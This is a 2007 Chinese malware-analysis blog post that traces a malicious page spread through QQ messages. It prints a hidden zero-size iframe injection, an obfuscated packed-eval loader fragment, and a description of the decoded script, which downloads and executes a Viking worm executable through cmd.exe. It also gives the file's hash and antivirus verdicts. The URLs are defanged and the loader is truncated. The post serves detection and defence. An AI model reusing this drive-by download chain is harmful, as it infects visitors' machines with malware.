endurer 原创
2007-03-17 第1版
QQ收到信息:
/---
---/
hxxp://www.b**b**a*imm.info 主页包含代码:
/---
<iframe src=hxxp://www.9*7***72***5.com/do**e1****2.htm width=0 height=0></iframe>
---/
hxxp://www.9*7***72***5.com/do**e1****2.htm 包含代码:
/---
<script src=css.js></script>
---/
css.js 的内容为 JavaScript代码:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('Z("//j//w……(略)……|110|114'.split('|'),0,{}))
---/
解密后的内容为一段 JavaScript脚本,主要功能是运行自定义函数 gn(n),利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe,保存为 %windir%/~tmp.tmp,并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
加密方法与昨天发现的
一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度
相同,就是下载的文件不同。
文件说明符 : D:/test/97725.exe
获取文件版本信息大小失败!
创建时间 : 2007-3-18 22:13:8
修改时间 : 2007-3-18 22:13:10
访问时间 : 2007-3-18 0:0:0
大小 : 64645 字节 63.133 KB
MD5 : 8d5e8b2ba870f4d23a460ee5c9a2ca7d
Kaspersky 报为:Worm.Win32.Viking.ix
Scanned file: 97725.exe - Infected |
97725.exe - infected by Worm.Win32.Viking.ix Statistics: |
Known viruses: | 282829 | Updated: | 18-03-2007 |
File size (Kb): | 64 | Virus bodies: | 1 |
Files: | 1 | Warnings: | 0 |
Archives: | 0 | Suspicious: | 0 |
主 题: | 病毒上报邮件分析结果-流水单号:6145224 | ||
发件人: | "" <send@rising.net.cn> | ||
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:97725.exe
病毒名:
Worm.Viking.pg
我们将在较新的19.15.02版本(瑞星2006的18.71.02版本)中处理解决,请您届时将您的瑞星软件升级到19.15.02(瑞星2006的18.71.02版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话,我们会推迟一到两版本后升级。
